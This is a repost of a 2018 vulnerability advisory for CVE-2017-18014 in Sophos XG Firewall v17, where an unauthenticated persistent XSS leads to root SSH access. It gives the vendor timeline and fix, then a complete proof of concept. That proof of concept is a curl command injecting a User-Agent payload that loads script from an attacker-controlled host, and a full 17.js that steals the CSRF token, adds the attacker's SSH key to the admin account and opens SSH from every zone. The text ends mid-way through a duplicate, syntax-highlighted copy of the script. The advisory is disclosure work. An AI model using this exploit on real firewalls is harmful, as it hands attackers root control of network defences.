{"id":11037,"date":"2018-01-08T14:20:13","date_gmt":"2018-01-08T22:20:13","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/01\/08\/news-4808\/"},"modified":"2018-01-08T14:20:13","modified_gmt":"2018-01-08T22:20:13","slug":"news-4808","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/01\/08\/news-4808\/","title":{"rendered":"SSD Advisory \u2013 Sophos XG from Unauthenticated Persistent XSS to Unauthorized Root Access"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Mon, 08 Jan 2018 06:21:27 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\" id=\"a-href-3612\">ssd@beyondsecurity.com<\/a><br \/> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes an unauthenticated persistent XSS that leads to unauthorized root access, found in Sophos XG version 17.<\/p>\n<p>Sophos XG Firewall &#8220;provides unprecedented visibility into your network, users, and applications directly from the all-new control center. 
You also get rich on-box reporting and the option to add Sophos iView for centralized reporting across multiple firewalls.&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> Sophos was informed of the vulnerability; their response was:<\/p>\n<ul>\n<li>On December 11th, we both received and acknowledged your submission of the issue<\/li>\n<li>On December 12th, we confirmed the issue and started working on a fix<\/li>\n<li>On December 20th, we released the official fix in XGv17 MR3: <a href=\"https:\/\/community.sophos.com\/products\/xg-firewall\/b\/xg-blog\/posts\/sfos-17-0-3-mr3-released\" rel=\"noopener\" target=\"_blank\">https:\/\/community.sophos.com\/products\/xg-firewall\/b\/xg-blog\/posts\/sfos-17-0-3-mr3-released<\/a><\/li>\n<li>On December 29th, we finished the automatic distribution of the fix backports to all previous releases of XGv16, v16.5, v17<\/li>\n<li>On December 31st, we published our security advisory with the acknowledgement as per your request: <a href=\"https:\/\/community.sophos.com\/kb\/en-us\/128024?elqTrackId=3a6db4656f654d65b352f526d26c6a17&#038;elq=1514ab02d2764e8cb73e6b0bdbe7e7be&#038;elqaid=2739&#038;elqat=1&#038;elqCampaignId=27053\" rel=\"noopener\" target=\"_blank\">https:\/\/community.sophos.com\/kb\/en-us\/128024?elqTrackId=3a6db4656f654d65b352f526d26c6a17&#038;elq=1514ab02d2764e8cb73e6b0bdbe7e7be&#038;elqaid=2739&#038;elqat=1&#038;elqCampaignId=27053<\/a><\/li>\n<\/ul>\n<p>CVE: CVE-2017-18014<br \/> <span id=\"more-3612\"><\/span><br \/> <strong>Vulnerability details<\/strong><br \/> An unauthenticated user can trigger a persistent XSS vulnerability in the WAF log page (Control Center -> Log Viewer -> filter option &#8220;Web Server Protection&#8221;) of the webadmin interface, which can be used to execute any action that the webadmin 
of the firewall can (creating a new user, enabling SSH and adding an SSH auth-key, etc.).<\/p>\n<p>In order to trigger the vulnerability we will demonstrate the following scenario:<\/p>\n<ul>\n<li>Sophos XG Firewall will be configured with 3 zones: Trusted, Untrusted, DMZ<\/li>\n<li>A web server will be placed in the DMZ<\/li>\n<li>The firewall will protect the web server using the Web Application Firewall (WAF) with the default Sophos recommended settings.<\/li>\n<li>An attacker, from the Untrusted network, will send a URL request to the web server in the DMZ. This causes the script to be injected into the WAF log page<\/li>\n<li>An admin, from Trusted, will visit the WAF log page<\/li>\n<li>The script, without any other interaction or alert, will add an SSH auth-key to the admin user and will allow SSH administration from Untrusted.<\/li>\n<li>The attacker will get a full root SSH shell<\/li>\n<\/ul>\n<p>The Sophos XG WAF log page will execute the &#8220;User-Agent&#8221; parameter in the POST request.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2.jpg\" data-slb-active=\"1\" data-slb-asset=\"659690422\" data-slb-internal=\"0\" data-slb-group=\"3612\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" class=\"alignnone size-medium wp-image-3615\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-300x169.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-768x432.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-1024x576.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2.jpg 1280w\" sizes=\"auto, (max-width: 300px) 
100vw, 300px\" \/><\/a><\/p>\n<p><strong>Proof of Concept<\/strong><br \/> <u>Sophos XG configuration:<\/u><\/p>\n<ul>\n<li>Firewall interface Trusted &#8211; 192.168.10.190 port A<\/li>\n<li>Firewall interface Untrusted &#8211; 192.168.0.192 port B<\/li>\n<li>Firewall interface DMZ &#8211; 192.168.20.190 port C<\/li>\n<\/ul>\n<p><u>Environment<\/u><\/p>\n<ul>\n<li>The Sophos XG Firewall admin portal will be at https:\/\/192.168.10.190:4444\/webconsole\/webpages\/login.jsp<\/li>\n<li>In the Trusted network, the Admin PC IP: 192.168.10.191<\/li>\n<li>In the DMZ network, the &#8220;Webserver&#8221; can be a netcat listener at IP: 192.168.20.191<\/li>\n<li>In the Untrusted network, the attacker controlled website IP: 192.168.0.12<\/li>\n<\/ul>\n<p>From the attacker PC create an ssh auth key (empty passphrase):<\/p>\n<div id=\"crayon-5a53ee9cb6ff3009920463\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">ssh-keygen -t rsa<\/textarea><\/div>\n<\/div>\n<p>Then read the pub key &#8211; this key will be used in the attack.<\/p>\n<p>Note that you have to encode part of your key when you insert it in the attack script &#8211; every &#8216;+&#8217; must be replaced with &#8216;%2B&#8217;.<\/p>\n<p>Modify the 17.js script (see below), replacing ===&gt;INSERT-YOUR-PUB-KEY&lt;=== with your pub key.<\/p>\n<p>Change the 17.js host to your website.<\/p>\n<p>Now run the following cURL command, injecting the &#8220;User-Agent&#8221;:<\/p>\n<div id=\"crayon-5a53ee9cb7003998916336\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">curl &#8220;http:\/\/WEBSERVER.COM&#8221; -H &#8220;Host: 192.168.0.192&#8221; -H &#8220;User-Agent:PERU&lt;i hidden&gt;&lt;iframe onload=&#8221;function JS(){var iH = document.getElementsByTagName(&#8216;head&#8217;)[0];var my = document.createElement(&#8216;script&#8217;);my.type = &#8216;text\/javascript&#8217;;my.src = &#8216;https:\/\/www.AttackerControlledWebsite.COM\/17.js&#8217;;iH.appendChild(my);};JS();&#8221;&gt;&lt;\/iframe&gt;&lt;\/i&gt;peru&#8221;<\/textarea><\/div>\n<\/div>\n<p>To trigger the attack, from the admin PC, go to the log page (Log Viewer &gt; Web Server Protection) and move the mouse over the packet details.<\/p>\n<p>Connect to Sophos XG using ssh from the attack PC (username is admin):<\/p>\n<p><u>17.js<\/u><\/p>\n<div id=\"crayon-5a53ee9cb7009772174720\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> var iframe1 = document.createElement(&#8216;iframe&#8217;);  iframe1.id = &#8216;peruid&#8217;;  iframe1.style = &#8216;width:0; height:0; border:0; border:none; vivibility:0&#8217;;  document.body.appendChild(iframe1);  var iframe2 = document.createElement(&#8216;iframe&#8217;);  iframe2.id = &#8216;peruid2&#8217;;  iframe2.style = &#8216;width:0; height:0; border:0; border:none; vivibility:0&#8217;;  document.body.appendChild(iframe2);  var url = window.location.href;  var arr = url.split(&#8216;\/&#8217;);  var IPV = arr[0] + &#8216;\/\/&#8217; + arr[2];  var arr2 = url.split(&#8216;=&#8217;);  var csrf = arr2[2];  var ajax = &#8216;{&#8220;username&#8221;:&#8221;admin&#8221;,&#8221;allowpubkeyauth&#8221;:&#8221;1&#8243;,&#8221;sshkey&#8221;:[&#8220;===&gt;INSERT-YOUR-PUB-KEY&lt;===&#8221;]}&#8217;;  var param = 
&#8220;csrf=&#8221;+csrf+&#8221;&amp;mode=2501&amp;Event=UPDATE&amp;Entity=PublicKeyAuth&amp;json=&#8221;+ajax+&#8221;&amp;__RequestType=ajax&amp;t=1507131213973&#8221;;  var xhttp = new XMLHttpRequest();  xhttp.open(&#8216;POST&#8217;, IPV+&#8217;\/webconsole\/Controller&#8217;, true);  xhttp.setRequestHeader(&#8220;Content-type&#8221;, &#8220;application\/x-www-form-urlencoded&#8221;);  xhttp.onreadystatechange = function() {  if (xhttp.readyState == 4 &amp;&amp; xhttp.status == 200) {       var doc = document.getElementById(&#8220;peruid&#8221;).contentWindow.document;       doc.open();       doc.write(xhttp.responseText);       doc.close();        }    }  xhttp.send(param);  var ajax2 = &#8216;{&#8220;localaclid&#8221;:[&#8220;LAN#2&#8243;,&#8221;LAN#4&#8243;,&#8221;LAN#6&#8243;,&#8221;LAN#13&#8243;,&#8221;LAN#5&#8243;,&#8221;LAN#9&#8243;,&#8221;LAN#8&#8243;,&#8221;LAN#14&#8243;,&#8221;LAN#10&#8243;,&#8221;LAN#7&#8243;,&#8221;LAN#38&#8243;,&#8221;LAN#23&#8243;,&#8221;LAN#18&#8243;,&#8221;WAN#4&#8243;,&#8221;WAN#10&#8243;,&#8221;WAN#38&#8243;,&#8221;DMZ#10&#8243;,&#8221;DMZ#38&#8243;,&#8221;DMZ#18&#8243;,&#8221;VPN#18&#8243;,&#8221;WiFi#2&#8243;,&#8221;WiFi#4&#8243;,&#8221;WiFi#6&#8243;,&#8221;WiFi#13&#8243;,&#8221;WiFi#5&#8243;,&#8221;WiFi#9&#8243;,&#8221;WiFi#8&#8243;,&#8221;WiFi#14&#8243;,&#8221;WiFi#10&#8243;,&#8221;WiFi#7&#8243;,&#8221;WiFi#38&#8243;,&#8221;WiFi#23&#8243;,&#8221;WiFi#18&#8221;]}&#8217;;  var param2 = &#8220;csrf=&#8221;+csrf+&#8221;&amp;mode=72&amp;json=&#8221;+ajax2+&#8221;&amp;__RequestType=ajax&#8221;;  var xhttp2 = new XMLHttpRequest();  xhttp2.open(&#8216;POST&#8217;, IPV+&#8217;\/webconsole\/Controller&#8217;, true);  xhttp2.setRequestHeader(&#8220;Content-type&#8221;, &#8220;application\/x-www-form-urlencoded&#8221;);  xhttp2.onreadystatechange = function() {  if (xhttp2.readyState == 4 &amp;&amp; xhttp.status == 200) {       var doc = document.getElementById(&#8220;peruid2&#8221;).contentWindow.document;       doc.open();       
doc.write(xhttp2.responseText);       doc.close();        }    }  xhttp2.send(param2);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-1\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">iframe1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;iframe&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-2\"><span class=\"crayon-v\">iframe1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;peruid&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-3\"><span class=\"crayon-v\">iframe1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">style<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;width:0; height:0; border:0; border:none; vivibility:0&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-4\"><span class=\"crayon-v\">document<\/span><span 
class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">appendChild<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">iframe1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-5\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">iframe2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;iframe&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-6\"><span class=\"crayon-v\">iframe2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;peruid2&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-7\"><span class=\"crayon-v\">iframe2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">style<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;width:0; height:0; border:0; border:none; vivibility:0&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-8\"><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">appendChild<\/span><span 
class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">iframe2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-9\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">window<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">location<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-10\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;\/&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-11\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IPV<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\/\/&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-sy\">[<\/span><span 
class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-12\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;=&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-13\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">csrf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr2<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-14\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ajax<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;{&#8220;username&#8221;:&#8221;admin&#8221;,&#8221;allowpubkeyauth&#8221;:&#8221;1&#8243;,&#8221;sshkey&#8221;:[&#8220;===&gt;INSERT-YOUR-PUB-KEY&lt;===&#8221;]}&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-15\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">param<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-s\">&#8220;csrf=&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">csrf<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;&amp;mode=2501&amp;Event=UPDATE&amp;Entity=PublicKeyAuth&amp;json=&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">ajax<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;&amp;__RequestType=ajax&amp;t=1507131213973&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-16\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">XMLHttpRequest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-17\"><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;POST&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IPV<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;\/webconsole\/Controller&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-18\"><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setRequestHeader<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Content-type&#8221;<\/span><span 
class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;application\/x-www-form-urlencoded&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-19\"><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">onreadystatechange<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-20\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">readyState<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getElementById<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;peruid&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">contentWindow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">responseText<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-26\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span 
class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-27\"><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">send<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">param<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-28\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ajax2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;{&#8220;localaclid&#8221;:[&#8220;LAN#2&#8243;,&#8221;LAN#4&#8243;,&#8221;LAN#6&#8243;,&#8221;LAN#13&#8243;,&#8221;LAN#5&#8243;,&#8221;LAN#9&#8243;,&#8221;LAN#8&#8243;,&#8221;LAN#14&#8243;,&#8221;LAN#10&#8243;,&#8221;LAN#7&#8243;,&#8221;LAN#38&#8243;,&#8221;LAN#23&#8243;,&#8221;LAN#18&#8243;,&#8221;WAN#4&#8243;,&#8221;WAN#10&#8243;,&#8221;WAN#38&#8243;,&#8221;DMZ#10&#8243;,&#8221;DMZ#38&#8243;,&#8221;DMZ#18&#8243;,&#8221;VPN#18&#8243;,&#8221;WiFi#2&#8243;,&#8221;WiFi#4&#8243;,&#8221;WiFi#6&#8243;,&#8221;WiFi#13&#8243;,&#8221;WiFi#5&#8243;,&#8221;WiFi#9&#8243;,&#8221;WiFi#8&#8243;,&#8221;WiFi#14&#8243;,&#8221;WiFi#10&#8243;,&#8221;WiFi#7&#8243;,&#8221;WiFi#38&#8243;,&#8221;WiFi#23&#8243;,&#8221;WiFi#18&#8221;]}&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-29\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">param2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;csrf=&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">csrf<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;&amp;mode=72&amp;json=&#8221;<\/span><span 
